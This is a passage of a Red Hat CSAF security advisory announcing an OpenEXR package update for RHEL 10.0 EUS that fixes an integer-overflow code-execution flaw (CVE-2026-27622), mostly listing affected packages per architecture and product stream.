| Unresolved product id: AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64 | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64 | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64 | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64 | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64 | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64 | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64 | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64 | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x | — |
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64 | — |
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for openexr is now available for Red Hat Enterprise Linux 10.0 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.\n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:7678",
"url": "https://access.redhat.com/errata/RHSA-2026:7678"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_7678.json"
}
],
"title": "Red Hat Security Advisory: openexr security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:29+00:00",
"generator": {
"date": "2026-05-14T22:36:29+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:7678",
"initial_release_date": "2026-04-13T02:25:56+00:00",
"revision_history": [
{
"date": "2026-04-13T02:25:56+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-13T02:25:56+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:29+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product": {
"name": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux_eus:10.0"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product": {
"name": "Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux_eus:10.0"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.10-8.el10_0.1.src",
"product": {
"name": "openexr-0:3.1.10-8.el10_0.1.src",
"product_id": "openexr-0:3.1.10-8.el10_0.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.10-8.el10_0.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.10-8.el10_0.1.aarch64",
"product": {
"name": "openexr-0:3.1.10-8.el10_0.1.aarch64",
"product_id": "openexr-0:3.1.10-8.el10_0.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.10-8.el10_0.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"product": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"product_id": "openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.10-8.el10_0.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"product": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"product_id": "openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.10-8.el10_0.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"product": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"product_id": "openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.10-8.el10_0.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"product_id": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.10-8.el10_0.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"product": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"product_id": "openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.10-8.el10_0.1?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.10-8.el10_0.1.ppc64le",
"product": {
"name": "openexr-0:3.1.10-8.el10_0.1.ppc64le",
"product_id": "openexr-0:3.1.10-8.el10_0.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.10-8.el10_0.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"product": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"product_id": "openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.10-8.el10_0.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"product": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"product_id": "openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.10-8.el10_0.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"product": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"product_id": "openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.10-8.el10_0.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"product_id": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.10-8.el10_0.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"product": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"product_id": "openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.10-8.el10_0.1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.10-8.el10_0.1.s390x",
"product": {
"name": "openexr-0:3.1.10-8.el10_0.1.s390x",
"product_id": "openexr-0:3.1.10-8.el10_0.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.10-8.el10_0.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"product": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"product_id": "openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.10-8.el10_0.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"product": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"product_id": "openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.10-8.el10_0.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"product": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"product_id": "openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.10-8.el10_0.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"product_id": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.10-8.el10_0.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"product": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"product_id": "openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.10-8.el10_0.1?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.10-8.el10_0.1.x86_64",
"product": {
"name": "openexr-0:3.1.10-8.el10_0.1.x86_64",
"product_id": "openexr-0:3.1.10-8.el10_0.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.10-8.el10_0.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"product": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"product_id": "openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.10-8.el10_0.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"product": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"product_id": "openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.10-8.el10_0.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"product": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"product_id": "openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.10-8.el10_0.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"product_id": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.10-8.el10_0.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"product": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"product_id": "openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.10-8.el10_0.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_0.1.src as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src"
},
"product_reference": "openexr-0:3.1.10-8.el10_0.1.src",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_0.1.src as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src"
},
"product_reference": "openexr-0:3.1.10-8.el10_0.1.src",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
